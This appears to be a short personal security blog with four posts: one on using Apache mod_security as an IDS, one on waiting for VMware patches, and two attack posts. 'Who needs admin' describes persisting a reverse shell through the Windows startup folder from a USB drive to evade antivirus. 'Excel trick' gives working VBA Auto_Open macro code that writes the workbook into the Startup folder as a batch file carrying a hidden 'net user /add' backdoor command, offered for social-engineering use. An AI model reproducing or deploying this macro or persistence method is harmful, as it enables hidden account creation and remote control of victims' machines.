Apache mod security

I have been working on a web proxy lately to put all of our production web servers behind. My part was to find an ids to integrate into the proxy. I found mod_security for apache. It is pretty sweet. Like any ids it has a bunch of rule sets like sql injection, xss, xst, command injection, etc... that it looks and it either logs the request, stops the request, or redirects the request. It is a pretty sweet project and so far it has worked well for us. it is best to only log requests at first or else the ids may stop legitimate traffic based on false positives.

Who needs admin

So the other day I decided to play around and see what it would take to gain control over a machine without administrative privileges. So this is what I did. I found a reverse connect back shell for windows on the government security page. Symantec does not detect it. I was going to code my own but I got lucky and found this one first. So then I wrote some batch files and visual basic scripts that would save them selves and the revshell into the user directory and user startup directory. These areas are all writable with non admin privs. The VBS script in the startup directory will strat up the revshell each time the user logs in. On a remote server I have netcat listening for a connection from my revshell. I then used my U3 drive and gonzor's switchblade to load the revshell and batch files onto the machine. So in the end all I have to do is plug my jumpdrive into a windows machine and I have instant control. If the user was running under a non administrative account I can then use exploits to elevate my privs on the machine. If the user was running an admin account then I have an instant administrative account on the machine. I chose to do it this way to keep antivirus from detecting the attack and to keep a non-administrative user from stopping the attack.

Attack Mitigation:

Run a firewall like zonealarm
Disable windows autorun
Be cautions of what media you put into your machine
Be cautions of what you run

Excel trick

This summer I discovered a fun trick using excel macros. It is possible to use an excel macro to save an excel workbook as a batch file. So I wrote a quick macro to do this. This macro will autorun when the excel book is opened. It will then save its self as a batch file in the startup directory and then change back to an xls file. Because xls file will be saved line by line as a bat file and bat files will ignore all lines that it doesn't understand you can hide one line like "net user /add hacked hackme" into a normal spreadsheet. This could be used for a social eng. attack because most people will just run the macro and never think trice about it. The next time they login to their account they will run what ever commands that you put into your batch file.

Sub Auto_Open()
ActiveWorkbook.SaveAs Filename:= _
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\go.bat", FileFormat:=xlText, _
CreateBackup:=False

ActiveWorkbook.SaveAs Filename:= _
"C:\windows\temp\pw add.xls", FileFormat:=xlNormal, _
Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, _
CreateBackup:=False
End Sub

Patiently Waiting

VMware emailed me on Monday to tell me that they have found another problem related to the vmdk crash issue. As a result they have postponed the patching of that issue till Q1 of 2009. They also informed me that they will wait to patch all my other vulnerabilities until Q1 2009. So I am still just patiently waiting. I never realized how long it can take to patch stuff like this.